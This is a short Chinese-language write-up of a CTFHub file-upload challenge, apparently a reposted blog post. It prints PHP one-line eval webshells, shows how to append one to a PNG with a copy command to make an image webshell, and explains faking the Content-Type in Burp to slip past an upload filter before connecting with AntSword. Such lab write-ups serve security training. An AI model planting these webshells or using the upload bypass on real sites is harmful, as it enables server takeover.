【CTF】CTFHub 技能樹 檔案頭檢查 writeup
阿新 • • 發佈:2020-09-15
✨PHP一句話木馬
<?php @eval($_POST["pass"]);?>
<?php eval($_REQUEST["pass"]);?>
詳情可瀏覽:Web安全-一句話木馬
✨製作圖片馬
1)copy命令
copy 1.png/b+1.php/a pic.php
!!!不要使用powershell 請使用cmd
//powershell中copy命令應該命令引數不一樣 導致各種報錯
2)文字編輯器/十六進位制編輯器
用文字編輯器/十六進位制編輯器開啟圖片在末尾新增一句話木馬
然後儲存為xxx.php
//經過測試後續也可以蟻劍連線 和copy命令比較只是檔案末尾少了個1A(檔案結束符)
知識擴充套件:ASCII碼0x1A使檔案意外結束的處理方法
✨Burp改包
Burp開啟proxy後對檔案上傳submit抓包
然後修改Content-Type為image/png
!注意修改位置
//靶場環境只允許PNG、JPG、GIF格式檔案上傳 改包繞過
✨蟻劍連線
獲得flag
結束。
✨圖片馬注意點
開始遇到問題蟻劍一直連線失敗
後來選用了較為簡單的圖片製作圖片馬蟻劍就連線成功了
製作圖片馬的圖片一定要簡單 越簡單越好
比如下面這樣的
⭐轉載請註明出處
本文作者:雙份濃縮馥芮白
原文連結:https://www.cnblogs.com/Flat-White/p/13673112.html
版權所有,如需轉載請註明出處。